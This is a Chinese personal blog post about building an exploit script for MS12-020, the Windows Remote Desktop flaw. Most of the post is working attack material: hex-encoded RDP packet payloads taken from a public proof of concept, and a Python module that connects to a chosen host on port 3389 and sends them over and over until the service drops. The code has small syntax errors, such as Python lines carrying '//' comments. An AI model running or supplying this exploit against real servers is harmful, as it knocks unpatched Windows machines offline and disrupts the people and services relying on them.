构造MS12-020攻击脚本

  1. 前言
  2. 正文

前言

放假回来意外的想写一个MS12-020的脚本,然后便去github搜了代码,看了一下。get到思路了
mmp,今天还要开家长会??? 凉凉= =
FkZbbd.md.jpg

正文

MS12-020漏洞公告与相关的bud:Microsoft Security Bulletin MS12-020 - Critical | Microsoft D补丁
MS12-020的exp:MS12-020_POC/MS12-020_exploit.py at master · traceur/MS12-020_POC · GitHub

从上面的链接得到shellcode:

buf="030000130ee000000000000100080000000000"
buf1="030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0"
buf2="0300000802f08028"

具体代码:

import socket
import binascii
from secistsploit.core.exploit import *
from secistsploit.core.tcp.tcp_client import TCPClient


class Exploit(TCPClient):
    __info__ = {
        "name": "MS12-020_exploit",
        "description": "Origin of loopholes锛歨ttps://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2012/ms12-020",
        "authors": (
            "demonsec",
        ),
        "references": (
             "www.ggsec.cn "
             "www.secist.com"
        ),

    }

    RHOSTS=OptIP("","Set RHOSTS IP")
    RPORT=OptPort(3389,"Set RHOSTS Port")
    def__init__(self):
        self.endianness = "<"
    def run(self):
        RHOSTS=(self.RHOSTS)
        RPORT=(self.RPORT)
        print('[+] RHOSTS:{}'.format(RHOSTS))
        print('[+] RPORT:{}'.format(RPORT))
        if RHOSTS!='' and RPORT!='':
            buf = binascii.unhexlify("030000130ee000000000000100080000000000")
            buf1 = binascii.unhexlify("030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0")
            buf2 = binascii.unhexlify("0300000802f08028") //通过binascii.unhexlify转换成16进制exp
            shellcode = buf + buf1 + buf2 //根据exp上的将buf组合起来


            while True:
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((RHOSTS, RPORT))
                    s.sendall(shellcode)
                    rec = s.recv(1024)
                    s.close()
                    print('[^] Attack completion')
                except:
                    print('[+] Successed!')
                    exit()

测试结果:
FkZLVA.md.jpg

FkZOUI.md.jpg

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:构造MS12-020攻击脚本

本文作者:九世

发布时间:2018-11-25, 08:40:44

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/82b8ed8c.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录